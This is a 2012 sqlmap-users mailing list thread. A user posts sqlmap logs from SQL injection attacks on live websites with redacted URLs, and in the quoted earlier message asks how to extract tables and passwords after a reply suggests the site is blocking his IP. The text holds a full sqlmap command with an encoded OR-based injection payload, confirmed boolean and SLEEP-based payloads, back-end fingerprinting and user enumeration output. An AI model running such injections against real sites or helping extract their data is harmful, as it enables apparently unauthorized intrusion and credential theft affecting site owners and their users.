[sqlmap-users] Re: sqlmap y/N can't workable
From: B. <sto...@qq...> - 2012-11-15 05:52:17
<div>Hi Iago,</div>
<div><br></div>
<div>The sqlmap error details are as follows:</div>
<div><br></div>
<div>
<div>[13:32:02] [INFO] testing connection to the target url</div>
<div>[13:32:06] [INFO] testing if the url is stable, wait a few seconds</div>
<div>[13:32:11] [INFO] url is stable</div>
<div>[13:32:11] [INFO] testing if POST parameter 'hidJumpId' is dynamic</div>
<div>[13:32:12] [INFO] confirming that POST parameter 'hidJumpId' is dynamic</div>
<div>[13:32:13] [INFO] POST parameter 'hidJumpId' is dynamic</div>
<div>[13:32:14] [WARNING] reflective value(s) found and filtering out</div>
<div>[13:32:14] [WARNING] heuristic test shows that POST parameter 'hidJumpId' might not be injectable</div>
<div>[13:32:14] [INFO] testing for SQL injection on POST parameter 'hidJumpId'</div>
<div>[13:32:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'</div>
<div>[13:32:49] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div>
<div>[13:33:04] [INFO] POST parameter 'hidJumpId' is 'AND boolean-based blind - WHERE or HAVING clause' injectable</div>
<div>[13:33:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'</div>
<div>[13:33:34] [CRITICAL] connection timed out to the target url or proxy. sqlmap is going to retry the request</div>
<div>[13:33:36] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'</div>
<div>[13:33:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'</div>
<div>[13:33:37] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'</div>
<div>[13:33:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'</div>
<div>[13:33:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'</div>
<div>[13:33:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'</div>
<div>[13:33:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'</div>
<div>[13:33:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'</div>
<div>[13:33:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'</div>
<div>[13:33:41] [INFO] testing 'Oracle AND time-based blind'</div>
<div>[13:33:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'</div>
<div>[13:33:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found</div>
<div>[13:33:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'</div>
<div>[13:33:55] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'</div>
<div>[13:34:08] [INFO] checking if the injection point on POST parameter 'hidJumpId' is a false positive</div>
<div>[13:34:12] [INFO] heuristics detected web page charset 'ascii'</div>
<div>POST parameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</div>
<div>N: command not found</div>
<div><br></div>
<div>[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div>
<div><br></div>
<div>[4]+ Stopped ./sqlmap.py -u "http://XXX" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=</div>
</div>
<div><br></div>
<div><includetail>
<div style="font-size: 12px;font-family: Arial Narrow;padding:2px 0 2px 0;">------------------ Original Message ------------------</div>
<div style="font-size: 12px;background:#efefef;padding:8px;">
<div><b>From:</b> "Iago Sousa"&lt;146...@gm...&gt;;</div>
<div><b>Sent:</b> Sunday, June 24, 2012, 12:33 PM</div>
<div><b>To:</b> "Bob"&lt;sto...@qq...&gt;;</div>
<div><b>Cc:</b> "sqlmap-users"&lt;sql...@li...&gt;;</div>
<div><b>Subject:</b> Re: [sqlmap-users] sqlmap always tell Connection timed out to the target url</div>
</div>
<div><br></div>
<p>I think that the site is blocking your IP address.</p>
<blockquote type="cite">On Jun 23, 2012 11:09 PM, "Bob" &lt;<a href="mailto:sto...@qq...">sto...@qq...</a>&gt; wrote:<br><br>
<div><br>Hi all,<br><br>
I am using sqlmap to retrieve the database.<br><br>
current-user and current-db are workable.<br><br>
Retrieving tables, passwords, etc. will respond with a time out.<br><br>
Could you tell me what the problem is? How can I retrieve tables and passwords?<br><br>
Thanks<br><br>
bob<br>
[09:56:07] [INFO] testing connection to the target url<br>
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>
---<br>
Place: GET<br>
Parameter: c_sn<br>
 Type: boolean-based blind<br>
 Title: AND boolean-based blind - WHERE or HAVING clause<br>
 Payload: c_sn=2' AND 8126=8126 AND 'Cqlm'='Cqlm<br><br>
 Type: AND/OR time-based blind<br>
 Title: MySQL > 5.0.11 AND time-based blind<br>
 Payload: c_sn=2' AND SLEEP(5) AND 'eKVl'='eKVl<br>
---<br><br>
[09:56:08] [INFO] testing MySQL<br>
[09:56:08] [INFO] confirming MySQL<br>
[09:56:08] [INFO] the back-end DBMS is MySQL<br>
web server operating system: Linux CentOS 5<br>
web application technology: Apache 2.2.3, PHP 5.1.6<br>
back-end DBMS: MySQL >= 5.0.0<br>
[09:56:08] [INFO] fetching current user<br>
[09:56:08] [INFO] resumed: keyway_db@localhost<br>
current user: 'keyway_db@localhost'<br><br>
[09:56:08] [INFO] fetching database users privileges<br>
[09:56:08] [INFO] fetching database users<br>
[09:56:08] [INFO] fetching number of database users<br>
[09:56:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval<br>
[09:56:08] [INFO] retrieved: <br>
[09:57:09] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>
[09:58:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>
[09:59:11] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request<br>
[10:00:12] [CRITICAL] connection timed out to the target url or proxy<br><br>
[*] shutting down at 10:00:12<br>
</div>
</blockquote>
</includetail></div>